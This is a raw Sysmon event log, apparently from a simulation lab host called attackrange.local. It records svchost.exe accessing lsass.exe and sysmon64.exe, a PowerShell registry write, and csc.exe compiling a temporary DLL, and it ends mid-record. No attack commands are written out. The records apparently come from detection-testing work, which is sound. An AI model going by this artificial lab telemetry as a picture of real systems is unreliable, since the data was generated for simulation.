10341000x8000000000000000296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.747{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.747{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.747{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:18.622{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\MaxSizeDWORD (0x12d2c000) 10341000x8000000000000000292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.575{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.575{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.575{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:33:18.294{59A5CD1D-8E1E-6005-C802-00000000A201}3708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\fdypqgxp.dll2021-01-18 13:33:18.200 10341000x8000000000000000288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8E1D-6005-C302-00000000A201}48324960C:\Windows\system32\conhost.exe{59A5CD1D-8E1E-6005-C902-00000000A201}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1E-6005-C902-00000000A201}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8E1E-6005-C802-00000000A201}37083928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{59A5CD1D-8E1E-6005-C902-00000000A201}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.298{59A5CD1D-8E1E-6005-C902-00000000A201}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESDCE.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC69DCE030F8894AC8949CBC1BB0885F81.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1D-6005-C64B-100000000000}0x104bc60HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{59A5CD1D-8E1E-6005-C802-00000000A201}3708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\fdypqgxp.cmdline" 10341000x8000000000000000275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8E1D-6005-C302-00000000A201}48324960C:\Windows\system32\conhost.exe{59A5CD1D-8E1E-6005-C802-00000000A201}3708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\